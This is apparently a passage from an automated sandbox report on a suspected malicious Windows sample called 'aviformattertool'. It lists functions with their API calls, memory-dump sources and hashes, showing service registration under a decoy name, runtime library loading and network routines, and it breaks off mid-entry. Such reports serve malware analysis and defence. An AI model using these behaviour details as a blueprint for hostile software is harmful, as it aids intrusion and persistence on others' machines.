                                                                                                                                                          Function 02A4ED73 Relevance: 1.5, APIs: 1, Instructions: 6fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: 52c37f47e2b2ae63367bb402eec93a74e70dc70e372dca8dea6b66cdd5c339eb
                                                                                                                                                          • Instruction ID: 4c954cae2a3067f42d3b7006341623640c6da45bf1579f3a4cdec85ff5677edd
                                                                                                                                                          • Opcode Fuzzy Hash: 52c37f47e2b2ae63367bb402eec93a74e70dc70e372dca8dea6b66cdd5c339eb
                                                                                                                                                          • Instruction Fuzzy Hash: D7B01231C48006DB86401710B6180116B707D0C2613340850EC4353010EF224C20C708
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004024F9 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: cc04ed41fe97aa041a251f47938a2406b4d5a5b85fee69cd464d355ff0bb3ea6
                                                                                                                                                          • Instruction ID: 813cbd8810634f1c2ffe08aed798b80336a3a6ba53271c94cca51eafd14900a1
                                                                                                                                                          • Opcode Fuzzy Hash: cc04ed41fe97aa041a251f47938a2406b4d5a5b85fee69cd464d355ff0bb3ea6
                                                                                                                                                          • Instruction Fuzzy Hash: C3B01270A00120CFC700CF64E54861837B0B7043003000365D403E2244C37004028B05
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040B139 Relevance: 1.5, APIs: 1, Instructions: 3threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 3eb748e00e0c83dace1b992d08d4b535e115f6e75f998ec5999bd22cf4e79796
                                                                                                                                                          • Instruction ID: ddd4c4f571a71136cf468c436c137655e454d488334c55525436d6d694ec5319
                                                                                                                                                          • Opcode Fuzzy Hash: 3eb748e00e0c83dace1b992d08d4b535e115f6e75f998ec5999bd22cf4e79796
                                                                                                                                                          • Instruction Fuzzy Hash: 6A900231059430A6C61056585F1D5256524710537A33503267133600F089740011560E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A220E0 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A21590: OpenEventA.KERNEL32(00100002,00000000,00000000,56FF5638), ref: 02A21630
                                                                                                                                                            • Part of subcall function 02A21590: CloseHandle.KERNEL32(00000000), ref: 02A21645
                                                                                                                                                            • Part of subcall function 02A21590: ResetEvent.KERNEL32(00000000,56FF5638), ref: 02A2164F
                                                                                                                                                            • Part of subcall function 02A21590: CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21684
                                                                                                                                                          • TlsSetValue.KERNEL32(00000026,?), ref: 02A2212A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1556185888-0
                                                                                                                                                          • Opcode ID: 2d5a03603b67bae87c181583a1894c57d149a9421d6fe48db6a46491d5ff22d5
                                                                                                                                                          • Instruction ID: fff1601a3aa5ec12d99c1506526b6f664d20217e8628ff157ba8e572054f5268
                                                                                                                                                          • Opcode Fuzzy Hash: 2d5a03603b67bae87c181583a1894c57d149a9421d6fe48db6a46491d5ff22d5
                                                                                                                                                          • Instruction Fuzzy Hash: EB017C75A44218BBD710CF58DD45B5ABBF8FB49B60F104B6AF82593280DB71A9048AA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040212F Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040707C), ref: 0040B837
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: 779ade60938cffdf9bf70a7663558addcb1eaf0f702dec8a6cf6d7e28e84d4b0
                                                                                                                                                          • Instruction ID: c9a81fc2d50226411bfbe9ae5daca65fdbaa1f2bd8fe53d75c828a19bb5c56c5
                                                                                                                                                          • Opcode Fuzzy Hash: 779ade60938cffdf9bf70a7663558addcb1eaf0f702dec8a6cf6d7e28e84d4b0
                                                                                                                                                          • Instruction Fuzzy Hash: 84E06531645218F7D7145E648C49F927F1EEB59B40F564021B6093B0D192B5A821D6EA
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402299 Relevance: 1.3, APIs: 1, Instructions: 10sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                          • Opcode ID: e6b7ed8ebc1c2266d08ff008d95ff8a2a734325e0a510ab97eb7a6d027d5ce22
                                                                                                                                                          • Instruction ID: 3b0d431550871fc352e63379a435855449a606008958c0ac35ecee8b1464f59e
                                                                                                                                                          • Opcode Fuzzy Hash: e6b7ed8ebc1c2266d08ff008d95ff8a2a734325e0a510ab97eb7a6d027d5ce22
                                                                                                                                                          • Instruction Fuzzy Hash: EDC04C25888511F7D51537606A1DE6C6624F709304F254177A903700D2577D456776DF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 02A208F8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02A20922
                                                                                                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02A2092A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                          • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                                                                                          • Instruction ID: 8c3259de03bfc9704deca1b4382dbd2dbd0885a37c8bcbaed328cd8f2d1c41e7
                                                                                                                                                          • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                                                                                          • Instruction Fuzzy Hash: 64F05430208341DFEB24CF29C891F2EBBE4ABAD744F54092CF596A2191D770D149CB56
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A294A8 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02A24E16,?,?,?,00000000), ref: 02A294AD
                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 02A294B6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                          • Opcode ID: 050dfa6b34015461bd9eed212e66053097083efcc64560e6ab7e755fdfad1902
                                                                                                                                                          • Instruction ID: 694cbe827ff705d637b28845a740a15bbec9da6195d9cb490ecd324ee33cd84f
                                                                                                                                                          • Opcode Fuzzy Hash: 050dfa6b34015461bd9eed212e66053097083efcc64560e6ab7e755fdfad1902
                                                                                                                                                          • Instruction Fuzzy Hash: 9BB0927548420CEBCB012B92EC09B99BF68EB06762F004810F60E440508F7294229AA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A124E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A124E6
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02A124FC
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A1250E
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A1256D
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02A1257F
                                                                                                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02A12599
                                                                                                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 02A125A2
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A125F0
                                                                                                                                                          • InterlockedDecrement.KERNEL32(00000002), ref: 02A1262F
                                                                                                                                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02A1268E
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A12699
                                                                                                                                                          • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02A126AD
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02A126BD
                                                                                                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 02A126C7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1213838671-0
                                                                                                                                                          • Opcode ID: cd74f582cf7cd6425cf219eb9126dbe096a29f3816ffdeb626e9774d354bd639
                                                                                                                                                          • Instruction ID: dfdd5b32140ed65c9434fca1c60635b250b481445a08066b119ed5a996fe5a70
                                                                                                                                                          • Opcode Fuzzy Hash: cd74f582cf7cd6425cf219eb9126dbe096a29f3816ffdeb626e9774d354bd639
                                                                                                                                                          • Instruction Fuzzy Hash: 79613EB1940219AFCB10DFA4D984AAEFBB9FF09320F104569F916E7240DB34D945CF60
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A14695 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1469A
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                          • htons.WS2_32(?), ref: 02A146FB
                                                                                                                                                          • htonl.WS2_32(?), ref: 02A1471E
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14725
                                                                                                                                                          • htons.WS2_32(00000000), ref: 02A147D9
                                                                                                                                                          • _sprintf.LIBCMT ref: 02A147EF
                                                                                                                                                            • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
                                                                                                                                                          • htons.WS2_32(?), ref: 02A14742
                                                                                                                                                            • Part of subcall function 02A196B7: __EH_prolog.LIBCMT ref: 02A196BC
                                                                                                                                                            • Part of subcall function 02A196B7: RtlEnterCriticalSection.NTDLL(00000020), ref: 02A19737
                                                                                                                                                            • Part of subcall function 02A196B7: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A19755
                                                                                                                                                            • Part of subcall function 02A11BA7: __EH_prolog.LIBCMT ref: 02A11BAC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11BBC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11BEA
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11C13
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11C56
                                                                                                                                                            • Part of subcall function 02A1DE73: __EH_prolog.LIBCMT ref: 02A1DE78
                                                                                                                                                          • htonl.WS2_32(?), ref: 02A14A0E
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14A15
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14A5A
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14A61
                                                                                                                                                          • htons.WS2_32(?), ref: 02A14A81
                                                                                                                                                          • htons.WS2_32(?), ref: 02A14A8B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1645262487-0
                                                                                                                                                          • Opcode ID: 9089862596572b3c9aa3c1f3e1a394458530601c7b4bc4e39346c684cff706c7
                                                                                                                                                          • Instruction ID: 33586d5447960145ade106c8467a3911691815f19bd7ec6388ad5be0e9b60c03
                                                                                                                                                          • Opcode Fuzzy Hash: 9089862596572b3c9aa3c1f3e1a394458530601c7b4bc4e39346c684cff706c7
                                                                                                                                                          • Instruction Fuzzy Hash: 0F0248B1C40219EEEF15DFE8C944BEEBBB9AF08324F14415AE505A7280DF745A49CFA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(JSON Nested Objects 66,Function_0000235E), ref: 004023C1
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402420
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402480
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 004024CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                                                          • String ID: JSON Nested Objects 66
                                                                                                                                                          • API String ID: 3346042915-4184186574
                                                                                                                                                          • Opcode ID: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
                                                                                                                                                          • Instruction ID: b1e04a5d4e7bd3d275470c836a5b4936d2fee142cab1bdbbff56863c8edf9318
                                                                                                                                                          • Opcode Fuzzy Hash: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
                                                                                                                                                          • Instruction Fuzzy Hash: 4921E470855348AFD2109F16EF48A16BEA9EB95755711413AE105B22B0C7BA0028CF2E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A282B2 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlDecodePointer.NTDLL(?), ref: 02A282BA
                                                                                                                                                          • _free.LIBCMT ref: 02A282D3
                                                                                                                                                            • Part of subcall function 02A22EF4: HeapFree.KERNEL32(00000000,00000000,?,02A25C52,00000000,?,?,?,00000000,?,02A28937,00000018,02A416B8,00000008,02A28884,?), ref: 02A22F08
                                                                                                                                                            • Part of subcall function 02A22EF4: GetLastError.KERNEL32(00000000,?,02A25C52,00000000,?,?,?,00000000,?,02A28937,00000018,02A416B8,00000008,02A28884,?,?), ref: 02A22F1A
                                                                                                                                                          • _free.LIBCMT ref: 02A282E6
                                                                                                                                                          • _free.LIBCMT ref: 02A28304
                                                                                                                                                          • _free.LIBCMT ref: 02A28316
                                                                                                                                                          • _free.LIBCMT ref: 02A28327
                                                                                                                                                          • _free.LIBCMT ref: 02A28332
                                                                                                                                                          • _free.LIBCMT ref: 02A28356
                                                                                                                                                          • RtlEncodePointer.NTDLL(007DA770), ref: 02A2835D
                                                                                                                                                          • _free.LIBCMT ref: 02A28372
                                                                                                                                                          • _free.LIBCMT ref: 02A28388
                                                                                                                                                          • _free.LIBCMT ref: 02A283B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3064303923-0
                                                                                                                                                          • Opcode ID: bbb0b397fb63cc72f4786285d08e272bac2ca8b70c6868d86a89f58dad77fb30
                                                                                                                                                          • Instruction ID: 80fff2ddc6f76dd24aa933946d6af9db352cf5cd995eb9aa4ccbe431e06d97b0
                                                                                                                                                          • Opcode Fuzzy Hash: bbb0b397fb63cc72f4786285d08e272bac2ca8b70c6868d86a89f58dad77fb30
                                                                                                                                                          • Instruction Fuzzy Hash: E421617AD81231CFDB255F1CF9806167BE9BB85B243194869E90457240CF3AEC5EDFA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A13428
                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02A1346B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A13472
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A13486
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A134D7
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000018), ref: 02A134ED
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02A13518
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                                                                          • String ID: CancelIoEx$KERNEL32
                                                                                                                                                          • API String ID: 2902213904-434325024
                                                                                                                                                          • Opcode ID: 6eb37c69467c37ae1534f01a61c800f605833c8fb08a17f16f70f169b2deb834
                                                                                                                                                          • Instruction ID: 2e9487524ffaa8292f54be61ae550b8e2e61b2d97f16fc00ff87f9ff22159326
                                                                                                                                                          • Opcode Fuzzy Hash: 6eb37c69467c37ae1534f01a61c800f605833c8fb08a17f16f70f169b2deb834
                                                                                                                                                          • Instruction Fuzzy Hash: EB3161B5900215DFDF119F68C985A6ABBF9FF49321F044899F9069B240DF70D911CFA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405857 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                          • API String ID: 2238633743-4044615076
                                                                                                                                                          • Opcode ID: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
                                                                                                                                                          • Instruction ID: 96757171791ba6acfa1a588329da0afe6fa494a71d71fef51203d82f368b70d2
                                                                                                                                                          • Opcode Fuzzy Hash: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
                                                                                                                                                          • Instruction Fuzzy Hash: 92012532600711AFCB11AFB5AD84A1B3FE8EB48750715443AFD05F2291D678D8359F6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405B1F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$ByteCharMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 352835431-0
                                                                                                                                                          • Opcode ID: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
                                                                                                                                                          • Instruction ID: 6c7c4d56f82388bc32b1a747b53f9b53fb7dea99d84d03387e69c39b219b6625
                                                                                                                                                          • Opcode Fuzzy Hash: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
                                                                                                                                                          • Instruction Fuzzy Hash: FD516931500609AFDF228F94CD45EAF7FB9EB48744F10412AF916B12A0D3399D61DF69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404BF9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
